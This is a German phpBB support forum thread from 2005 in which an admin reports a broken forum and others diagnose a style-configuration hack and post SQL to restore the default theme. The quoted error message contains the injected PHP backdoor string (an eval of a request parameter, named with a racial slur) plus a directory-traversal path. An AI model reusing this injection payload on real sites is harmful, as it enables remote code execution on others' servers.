Seite 1 von 3

hilfe bitte und diesmal wär schön, wenn mir mal jemand hilft

Verfasst: 03.04.2005 07:36
von la miserable
phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 335
File : /var/www/html/phpBB2/includes/functions.php

bis um 200 uhr is dass forum nachweislich gelaufen, und nu kommt dass

Verfasst: 03.04.2005 08:52
von Kort
la miserable hat geschrieben:bis um 200 uhr is dass forum nachweislich gelaufen, und nu kommt dass
Sowas kommt nicht von selbst. Irgenwas wirste schon gemacht haben.

Verfasst: 03.04.2005 10:29
von CaptHowdy
hast du version .13 installiert? schaut nach nem hack aus ...

Verfasst: 03.04.2005 12:19
von marino
KB:89

Verfasst: 03.04.2005 12:32
von mad-manne
CaptHowdy hat geschrieben:hast du version .13 installiert? schaut nach nem hack aus ...
YEP .. das mit dem nigga ist ein hack, der irgendwie die Style-Konfiguration angreift ...

Gruss,
Manne,

Gaanz einfach

Verfasst: 03.04.2005 16:14
von glabstul
per phpmyadmin folgende Tabellen leeren (nicht löschen)
_themes
_themes_name

danach folgendes SQL:

Code: Alles auswählen

INSERT INTO phpbb_themes VALUES (1, 'subSilver', 'subSilver', 'subSilver.css', '', 'E5E5E5', '000000', '006699', '5493B4', '', 'DD6900', 'EFEFEF', 'DEE3E7', 'D1D7DC', '', '', '', '98AAB1', '006699', 'FFFFFF', 'cellpic1.gif', 'cellpic3.gif', 'cellpic2.jpg', 'FAFAFA', 'FFFFFF', '', 'row1', 'row2', '', 'Verdana, Arial, Helvetica, sans-serif', 'Trebuchet MS', 'Courier, \'Courier New\', sans-serif', 10, 11, 12, '444444', '006600', 'FFA34F', '', '', '', NULL, NULL);
und

Code: Alles auswählen

INSERT INTO phpbb_themes_name VALUES (2, 'grau', 'grau', 'grau', '', '', '', 'blau', 'blau', '', 'cellpic1.jpg', 'cellpic2.jpg', 'cellpic3.jpg', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '');
Edit: Nicht vergessen, deinen Suffix vor den Tabellennamen zu stellen.


danach die tabelle _config öffnen und
in das Feld

default_style

den wert 1 eintragen.

somit hast du wieder Zugang.

Bei mir hats einwandfrei geklappt.

Ach ja, ich gehe davon aus, daß subsilver noch normal zur Verfügung steht.

Gruß, glabstul

PS: 1. Es ist hier tatsächlich ein Script-Kid unterwegs und 2. bei mir hats trotz Version 2.0.13 den selben Angriff gegeben. War aber bei mir nur teilweise erfolgreich, weil ich zwei themes in der Tabelle hatte. Lediglich das von mir modifizierte wurde gehackt. Ich hatte das modifizierte als Standard eingetragen und den Usern nicht erlaubt, zu ändern.

Re: Gaanz einfach

Verfasst: 04.04.2005 22:27
von An-Ja
glabstul hat geschrieben: PS: 1. Es ist hier tatsächlich ein Script-Kid unterwegs und 2. bei mir hats trotz Version 2.0.13 den selben Angriff gegeben. War aber bei mir nur teilweise erfolgreich, weil ich zwei themes in der Tabelle hatte. Lediglich das von mir modifizierte wurde gehackt. Ich hatte das modifizierte als Standard eingetragen und den Usern nicht erlaubt, zu ändern.
Hallo,
ist schon bekannt, wie der Hacker vorgegangen ist und vorallem wie man dieser Sache vorbeugen kann?
Viele Grüsse :)

Re: Gaanz einfach

Verfasst: 04.04.2005 22:37
von fanrpg
glabstul hat geschrieben: PS: 1. Es ist hier tatsächlich ein Script-Kid unterwegs und 2. bei mir hats trotz Version 2.0.13 den selben Angriff gegeben. War aber bei mir nur teilweise erfolgreich, weil ich zwei themes in der Tabelle hatte. Lediglich das von mir modifizierte wurde gehackt. Ich hatte das modifizierte als Standard eingetragen und den Usern nicht erlaubt, zu ändern.
Also dürfen wir uns schon auf eine 2.0.14 Version freuen :D

Re: Gaanz einfach

Verfasst: 04.04.2005 23:04
von An-Ja
fanrpg hat geschrieben: Also dürfen wir uns schon auf eine 2.0.14 Version freuen :D
Seh ich auch so. Aber vielleicht lässt sich bis zum Erscheinen der 2.0.14 irgendwie eine Übergangslösung für dieses Problem finden :roll:

Verfasst: 05.04.2005 14:26
von Christian_N
Auf phpbb2.de wurde auch schon darüber gesproche:
http://www.phpbb2.de/viewtopic.php?p=143878

Also wenn es tatsächlich ein, Wurm, Crack oder sowas ist, dann muss man die phpBB Group auf die 2 themen mal aufmerksam machen (Admin) das die ggf. dann mal dies auf der sprügen gehn könnten, damit es dann ggf. schnellst möglich gefix wird, damit nicht noch mehre opfer geben.

Gruß SuesseMaus28884